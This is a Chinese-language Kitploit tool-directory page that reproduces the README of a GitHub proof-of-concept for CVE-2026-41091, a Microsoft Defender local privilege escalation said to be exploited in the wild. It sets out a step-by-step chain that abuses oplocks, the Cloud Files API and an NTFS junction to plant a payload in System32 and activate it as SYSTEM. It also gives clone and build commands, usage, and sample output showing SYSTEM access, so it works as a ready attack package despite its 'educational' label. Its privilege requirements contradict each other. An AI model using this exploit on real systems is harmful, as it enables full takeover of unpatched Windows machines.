Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41091-PoC-Exploit — CVE-2026-41091 RedSun | Microsoft Defender 本地权限提升(LPE)漏洞利用。低权限用户可通过 Cloud Files API + NTFS junction 技巧获得 NT AUTHORITY\SYSTEM 🔥。强制 Defender 以 SYSTEM 权限将恶意载荷写入 System32。⚠️ 已在野外被积极利用。CVSS 7.8。补丁:Defender Engine 1.1.26040.8。🛡️ 仅供教育用途的 PoC。 | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-41091-poc-exploit
权限提升漏洞分析漏洞利用后渗透利用学习与教育Payload 开发二进制利用
GitHubtc4dy/cve-2026-41091-poc-exploit

CVE-2026-41091-PoC-Exploit

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41091 RedSun | Microsoft Defender 本地权限提升(LPE)漏洞利用。低权限用户可通过 Cloud Files API + NTFS junction 技巧获得 NT AUTHORITY\SYSTEM 🔥。强制 Defender 以 SYSTEM 权限将恶意载荷写入 System32。⚠️ 已在野外被积极利用。CVSS 7.8。补丁:Defender Engine 1.1.26040.8。🛡️ 仅供教育用途的 PoC。

查看仓库
31个月前尚未审核

SolarFlare

☀️ CVE-2026-41091 - RedSun (SolarFlare) - Microsoft Defender 本地权限提升漏洞

C++ Windows License CVSS CISA KEV

Microsoft Defender 链接跟随漏洞 - 本地权限提升至 NT AUTHORITY\SYSTEM

该漏洞被称为 "RedSun" 🎯,"SolarFlare" 是我给我的漏洞利用取的名字。 ✅

📌 概述

此仓库包含针对 CVE-2026-41091(Microsoft Defender / Microsoft 恶意软件防护引擎中的关键本地权限提升漏洞)的完整工作概念验证 (PoC) 漏洞利用。通过利用不正确的链接解析 (CWE-59),经过身份验证的低权限攻击者可以获得 NT AUTHORITY\SYSTEM 权限。

此漏洞也称为 "RedSun" 或 "SolarFlare",允许攻击者诱使 Microsoft Defender 使用云文件 API (CfAPI) 和 NTFS 交接点向受保护的系统位置写入具有 SYSTEM 权限的任意文件。

注意: 此仓库包含两个版本:

  • basic_poc.cpp - 简化算法演示(教学用途)
  • full_poc.cpp - 完整的工作漏洞利用,包含所有功能

🔥 关键特性

🎯 漏洞详情

📦 受影响产品

产品受影响版本修复版本
Microsoft 恶意软件防护引擎< 1.1.26040.81.1.26040.8+
Microsoft Defender 反恶意软件平台< 4.18.26040.74.18.26040.7+

🔬 漏洞利用链

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────────┐
│ SOLARFLARE 漏洞利用链                                                    │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                              │
│ 1. 创建工作目录                                                 │
│    └─> %TEMP%\SF-XXXX\                                                      │
│                                                                              │
│ 2. 使用 EICAR 触发 Defender                                                 │
│    └─> 将反转的 EICAR 写入诱饵文件                                   │
│                                                                              │
│ 3. 等待 VSS 快照                                                    │
│    └─> 检测卷影副本创建                                             │
│                                                                              │
│ 4. 创建第一批 Oplock                                                │
│    └─> 在诱饵文件上执行 FSCTL_REQUEST_BATCH_OPLOCK                              │
│                                                                              │
│ 5. 等待 Oplock 中断                                                    │
│    └─> 获取独占访问                                                │
│                                                                              │
│ 6. 重命名目录                                                         │
│    └─> 将原始目录移至 .tmp                                      │
│                                                                              │
│ 7. 注册云同步根                                                 │
│    └─> 使用云文件 API 执行 CfRegisterSyncRoot                                   │
│                                                                              │
│ 8. 创建云占位符                                                 │
│    └─> 为诱饵文件执行 CfCreatePlaceholders                                   │
│                                                                              │
│ 9. 创建第二批 Oplock                                                │
│    └─> 在云占位符上执行 FSCTL_REQUEST_BATCH_OPLOCK                      │
│                                                                              │
│ 10. 等待第二次 Oplock 中断                                            │
│     └─> 获取独占访问                                                │
│                                                                              │
│ 11. 重命名云目录                                                  │
│     └─> 将云目录移至 .cloud.tmp                                  │
│                                                                              │
│ 12. 创建指向 System32 的 NTFS 交接点                                    │
│     └─> 重定向至 C:\Windows\System32                                     │
│                                                                              │
│ 13. 复制负载到 System32                                                │
│     └─> 将诱饵文件复制到 System32 并命名为 TieringEngineService.exe              │
│                                                                              │
│ 14. 以 SYSTEM 身份激活服务                                              │
│     └─> CoCreateInstance(StorageTiersManagement)                            │
│                                                                              │
└─────────────────────────────────────────────────────────────────────────────┘

📦 安装

先决条件

  • Windows 10/11 或 Windows Server 2019/2022
  • 带有 C++ 工具的 Visual Studio 2019/2022
  • 管理员权限(用于执行)

构建

root@kitploit:~
# 克隆仓库
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit

# 使用 Visual Studio 开发者命令提示符构建
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# 或构建基础版本
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

🛠️ 用法

完整漏洞利用(SYSTEM 权限提升)

root@kitploit:~
full_poc.exe

基础算法演示

root@kitploit:~
basic_poc.exe

📋 示例输出

完整漏洞利用输出

root@kitploit:~
CVE-2026-41091 SolarFlare PoC
===============================
     by @tc4dy | CVSS 7.8
===============================

[*] SolarFlare 漏洞利用已启动。
[*] 创建工作目录...
[+] 目录已创建: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] 使用 EICAR 触发 Defender...
[+] Defender 已触发
[*] 等待 VSS 快照...
[+] VSS 快照已检测到
[*] 创建第一个 oplock...
[+] 第一个 oplock 已创建
[*] 等待 oplock 中断...
[+] Oplock 已获取
[*] 重命名目录...
[+] 目录已重命名
[*] 创建第二个 oplock...
[+] 第二个 oplock 已创建
[*] 等待第二个 oplock...
[+] 第二个 oplock 已获取
[*] 重命名云目录...
[+] 云目录已重命名
[*] 创建指向 System32 的 NTFS 交接点...
[+] 交接点已创建
[*] 等待 Defender 完成...
[*] 复制负载到 System32...
[+] 负载已复制到 C:\Windows\System32\TieringEngineService.exe
[*] 激活 Storage Tiers Management 服务...
[+] 服务已作为 SYSTEM 激活

[+] 已获得 SYSTEM 访问权限!

基础 PoC 输出

root@kitploit:~
CVE-2026-41091 Basic PoC
========================================
  仅算法演示
========================================
[*] 启动漏洞利用算法...
[*] 创建工作目录...
[+] 目录已创建: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] 使用 EICAR 触发 Defender...
[+] Defender 已触发
[*] 等待 VSS 快照...
[+] VSS 已检测到
[*] 创建第一个 oplock...
[+] 第一个 oplock 已创建
[*] 等待 oplock 中断...
[+] Oplock 已获取
[*] 重命名目录...
[+] 目录已重命名
[*] 创建第二个 oplock...
[+] 第二个 oplock 已创建
[*] 等待第二个 oplock...
[+] 第二个 oplock 已获取
[*] 创建指向 System32 的 NTFS 交接点...
[+] 交接点已创建
[*] 等待 Defender 完成...
[*] 复制负载到 System32...
[+] 负载已复制到 C:\Windows\System32\Payload.exe

[+] 算法演示完成!
[i] 这仅为基础算法。
[i] 要获得完整的 SYSTEM 权限提升,
[i] 请使用带有云 API 和 COM 激活的 full_poc.cpp。

🔧 构建说明

使用 Visual Studio

  1. 打开 VS 2022 的开发者命令提示符
  2. 导航到漏洞利用目录
  3. 运行:
root@kitploit:~
# 完整漏洞利用
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# 基础 PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

使用 CMake

root@kitploit:~
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)

set(CMAKE_CXX_STANDARD 17)

add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)

add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)

⚠️ 要求与限制

🔗 相关漏洞利用

查看我的其他漏洞利用仓库:

  • CVE-2026-24061-PoC-Exploit - GNU inetutils-telnetd 认证绕过
  • CVE-2026-41940-PoC-Exploit - cPanel/WHM 认证绕过漏洞利用
  • CVE-2026-0073-PoC-Exploit - Android ADB 无线调试认证绕过
下载工具
类别功能
利用✅ 本地权限提升至 SYSTEM
✅ 云文件 API (CfAPI) 集成
✅ 云占位符创建
✅ NTFS 交接点重定向
技术✅ 批量 oplock 滥用
✅ VSS 快照检测
✅ EICAR 触发
✅ COM 服务激活
目标✅ Microsoft Defender < 1.1.26040.8
✅ Windows 10/11
✅ Windows Server 2019/2022
可用性✅ 详细日志记录
✅ 错误处理
✅ 随机目录名
✅ 自动清理
属性值
CVE IDCVE-2026-41091
CVSS 分数7.8(高)
CVSS 向量AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
攻击向量本地
所需权限低
用户交互无
影响SYSTEM 级代码执行
CISA KEV✅ 是(已在野外被积极利用)
可用补丁Microsoft 恶意软件防护引擎 1.1.26040.8
要求详情
操作系统Windows 10/11, Server 2019/2022
权限管理员(用于执行)
Defender必须启用 Microsoft Defender
互联网VSS 快照检测需要
补丁仅在未修补系统上有效
架构仅 x64